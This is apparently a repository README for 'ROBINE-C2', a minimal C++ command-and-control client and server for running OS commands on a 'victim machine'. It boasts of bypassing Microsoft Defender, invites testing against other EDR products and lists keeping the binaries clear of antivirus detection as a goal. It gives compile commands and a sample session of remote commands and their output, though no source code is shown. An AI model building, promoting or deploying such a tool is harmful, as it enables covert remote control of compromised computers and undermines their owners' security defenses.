
C2 that would probably bypass everything since it's so simple, but not much features than execute commands, and get info from the victim machine.

Primary LanguageC++


+-+-+-+-+-+-+-+-+-+ |R|O|B|I|N|E|-|C|2| +-+-+-+-+-+-+-+-+-+

Cheap and fast C2, nothing is encrypted, and sometimes going back to the basics yields some funny results.

  • Tested in a lab with Defender, and it works. (Security intelligence Version: AV: 1.399.939.0, AS: 1.399.939.0, NIS: 1.399.939.0 Engine Version: AM: 1.1.23090.2007, NIS: 1.1.23090.2007)
  • It would probably bypass the other EDR, who knows, if you can test it tell me.
  • Simple works fine sometimes.


  • Add more information from the compromised host and report back to the server.
  • Encryption between client and server.
  • Some form of GUI for the server.
  • Other stuff.
  • Keep the binaries clean of static antivirus detection engines.

How to compile

cl client.cpp /EHsc /link ws2_32.lib
cl server.cpp /EHsc /link ws2_32.lib
Waiting for client connection...
Enter OS command to send: dir
Command Output:
 Volume in drive C has no label.
 Volume Serial Number is 1337-1337

 Directory of C:\Users\batman\Desktop

10/19/2023  01:24 PM    <DIR>          .
10/19/2023  01:24 PM    <DIR>          ..
10/16/2023  08:19 AM         1,939,696 windowsupdate.cpl
09/29/2022  08:26 PM         2,774,440 Bginfo64.exe
08/27/2023  01:50 PM             1,965 Process Lover 2.lnk
10/18/2023  08:02 AM             7,680 SharpMoneyMaker.exe
               5 File(s)      4,832,325 bytes
               2 Dir(s)  100,727,209,984 bytes free

Enter OS command to send: hostname
Command Output: